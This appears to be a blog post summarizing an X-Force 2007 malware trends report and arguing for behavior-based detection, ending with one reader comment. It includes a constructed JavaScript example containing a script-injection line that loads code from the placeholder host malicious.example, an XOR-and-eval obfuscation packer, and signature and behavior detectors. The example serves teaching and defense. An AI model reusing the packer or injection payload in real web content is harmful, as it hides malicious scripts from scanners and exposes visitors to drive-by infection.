Malware Trend in 2007

I read the IBM Internet Security System X-Force 2007 Trend
Statistics report. This is a report describing trends for various threats in 2007.
This team has been tracking trends since 2000. I found the report
to be quite interesting. In the rest of this post, I highlight some
of the interesting points from the report and what they mean in the
context of malware detection.

(I) The X-Force team reports continued growth in Web browser exploitation. This
clearly shows that the infection vector is shifting to the Web. Earlier,
the primary infection vectors were email and the network. Therefore,
for detecting malware, drive-by downloads (DBD) and other threats that target the Web browser need a lot of attention.

(II) X-Force also reports a marked increase in obfuscated exploits, i.e.,
exploits that use various code obfuscation techniques (such as encryption).
Here is a quote, "X-Force estimated that nearly 80 percent of Web exploits
used obfuscation and/or self decryption ... By the end of 2007, X-Force
believed this rate had reached 100 percent, ...". This means that going
forward, Web exploits will increasingly harbor indiscernible code, rendering signature-based techniques less effective. Advanced
techniques (such as behavior-based detection) are clearly needed to detect
such malware. To exacerbate the situation, the X-Force report stated that
there was a 30% increase in new malware samples in 2007 over 2006. This
further drives home the point that signature-based detectors will have trouble
keeping up with the volume of malware, as they cannot detect new threats.
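
To make the contrast between signature-based and behavior-based detection concrete, here is an added example (not from the X-Force report or the original post). The sample script, the XOR key, the placeholder host malicious.example and all function names are constructed for illustration.

```javascript
// Constructed sample (not from the X-Force report): a harmless stand-in for a
// Web exploit that injects a remote script. The host is a reserved placeholder.
const PLAIN =
  'document.write("<script src=http://malicious.example/x.js></script>")';

// Builds the constructed test input: the payload XORed with a one-byte key plus
// a stub that decodes and eval()s it at run time ("self decryption").
function makeSelfDecryptingSample(src, key) {
  const bytes = Array.from(src, (c) => c.charCodeAt(0) ^ key);
  return `var d=[${bytes}],s="";for(var i=0;i<d.length;i++)` +
    `s+=String.fromCharCode(d[i]^${key});eval(s);`;
}

// Signature-based detection: byte patterns matched against the static source.
const SIGNATURES = [/malicious\.example/, /document\.write\(\s*["']<script/i];
function signatureScan(src) {
  return SIGNATURES.some((re) => re.test(src));
}

// Behavior-based detection: run the script against instrumented stand-ins for
// eval and document, and record what it does. (Illustration only: new Function
// is not an isolation boundary; real analyzers use an emulator or sandbox.)
function observeBehavior(src) {
  const events = [];
  const fakeDocument = {
    write: (html) => events.push({ api: "document.write", arg: String(html) }),
  };
  const run = (code) =>
    new Function("eval", "document", code)(hookedEval, fakeDocument);
  function hookedEval(code) {
    events.push({ api: "eval", arg: String(code) });
    run(String(code)); // keep following the script through each unpacking layer
  }
  try { run(src); } catch (e) { events.push({ api: "error", arg: String(e) }); }
  return events;
}

// The verdict depends on observed actions, not on how the source bytes look.
function behaviorVerdict(events) {
  const unpacked = events.some((e) => e.api === "eval");
  const injectsRemoteScript = events.some(
    (e) => e.api === "document.write" && /<script[^>]+src=/i.test(e.arg));
  return { unpacked, injectsRemoteScript, malicious: injectsRemoteScript };
}
```

Changing the key changes every byte of the packed sample, so a static pattern written for one variant misses the next, while the recorded behavior stays the same.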

(III) There was another very interesting point made by the report. Modern
malware uses features from various types of classic malware (such as viruses, worms,
and spyware), pulling the successful features of each into new strains. To quote the report, "Modern malware is now the digital equivalent
of the Swiss Army knife, and 2007 data continues to support this." This trend
also indicates that the behavior of malware is becoming more sophisticated, which
again supports my claim that detection techniques based on analyzing behavior are
better suited to handle malware of the future. Another interesting tidbit from the
report: "Trojans make up the largest class of malware in 2007 as opposed to downloaders,
which were the largest category in 2006." Recall that a Trojan appears to be a
legitimate file with some hidden functionality (for example, that of a rootkit).
Trojans are historically a problematic class of malware for signature-based
detection.

Overall, I found the report to be very interesting. Read it for yourself.
You can find the report here.

Comments

alice said…
Hey, I am a newcomer in the security area. I found your blog quite helpful. Keep writing!
I agree that signature-based methods are less effective for polymorphic viruses. But I am not quite sure how behavior-based detection works. Could you provide some examples?
